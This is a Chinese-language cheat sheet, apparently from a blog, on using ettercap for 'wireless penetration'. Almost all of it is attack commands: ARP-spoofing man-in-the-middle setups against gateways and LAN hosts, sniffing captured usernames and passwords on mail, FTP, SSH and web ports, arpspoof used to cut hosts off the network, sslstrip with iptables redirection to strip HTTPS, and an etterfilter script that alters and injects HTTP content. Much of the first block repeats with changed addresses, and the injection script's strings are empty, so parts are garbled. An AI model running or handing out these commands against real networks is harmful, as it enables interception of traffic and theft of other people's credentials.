无线渗透之ettercap
ettercap命令查看
# ettercap -h
ettercap渗透测试:
# ettercap -Tzq 以命令行方式显示(-T),只嗅探本地数据包(-z),只显示捕捉到的用户名和密码以及其他信息(-q)。
# ettercap -T -M arp:remote /192.168.1.1// /192.168.1.2-10// 嗅探网关192.168.1.1与部分主机192.168.1.2-10之间相互通信的数据包。
# ettercap -Tzq ///110 只嗅探本机110端口pop3的信息。
# ettercap -Tzq /192.168.0.11//21,22,23 只嗅探本机与192.168.0.11主机在端口21、22、23上的通信。
# ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /192.168.0.11/80 // 在eth0网卡上用自己的filter嗅探ip为192.168.0.11主机在80端口上的所有通信,并把所有的数据包保存成文件名为“sniffed_data”的文件。
# ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.1/ /10.1.1.2/ 单向欺骗路由,只劫持路由发向10.1.1.2的数据包。
1.ARP欺骗之会话劫持:
ettercap -i eth0 -T -M arp:remote /10.0.0.1/ /// 欺骗局域网内所有主机 ettercap -i eth0 -T -M arp:remote /10.0.0.1/ /10.0.0.12//欺骗IP为10.0.0.12的主机
ettercap -i eth0 -Tq -M arp:remote /192.168.1.103/ /192.168.1.1/ 主要参数的意义如下:
-T:文本模式(-G是图形界面) -q:安静模式,不用每个包的数据都显示,嗅到密码显示就OK了
-M:方法,arp:remote(还有一种选择是桥接,这里就不试了)
//:是代表目标的写法,MAC地址/ip/端口 # ettercap -Tzq 以命令行方式显示,只嗅探本地数据包,只显示捕捉到的用户名和密码以及其他信息。
# ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/ 嗅探网关192.168.1.1与部分主机192.168.1.2-10之间相互通信的数据包。
# ettercap -Tzq //110 只嗅探本机110端口pop3的信息。
# ettercap -Tzq /192.168.1.11/21,22,23 只嗅探本机与192.168.1.11主机在端口21、22、23上的通信。
# ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /192.168.1.11/80 // 在eth0网卡上用自己的filter嗅探ip为192.168.1.11主机在80端口上的所有通信,并把所有的数据包保存成文件名为“sniffed_data”的文件。
# ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /192.168.1.1/ /192.168.1.2/ 单向欺骗路由,只劫持路由发向192.168.1.2的数据包。
1.ARP欺骗之会话劫持:
ettercap -i eth0 -T -M arp:remote /192.168.1.1/ // 欺骗局域网内所有主机 ettercap -i eth0 -T -M arp:remote /192.168.1.1/ /192.168.1.12/ 欺骗IP为192.168.1.12的主机 同时使用tcpdump抓包(当然也可以使用wireshark实时抓包并显示,但对本机压力比较大,建议使用tcpdump抓包,完成后再用wireshark显示): tcpdump -i eth0 2.编译自建规则 etterfilter -o test.ef test.filter 3 获取账号 arpspoof -i 网卡 -t 目标IP 网关 #断网攻击
HTTP账号密码获取:
命令:echo 1 > /proc/sys/net/ipv4/ip_forward # 写入 1 表示开启转发功能!
可以用cat查看修改:
命令:cat /proc/sys/net/ipv4/ip_forward # 显示1表示成功开启转发功能,0表示未开启
命令:arpspoof -i 网卡 -t 目标IP 网关 #开启欺骗
用ettercap抓取登入帐号,密码:
命令:ettercap -Tq -i 网关 # T表示文本模式,q表示安静模式
HTTPS账号密码获取: 先编辑下/etc/ettercap/etter.conf 命令:vim /etc/ettercap/etter.conf 找到 # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
改为(去掉两个#): # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
运行sslstrip -a -f -k 实现https转换成http以获取帐号密码
如果图形界面,可以用这个试试:driftnet -i wlan0 etter.filter.alert 脚本: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "")) { replace("",""); replace("",""); msg("injected ok!\n"); } }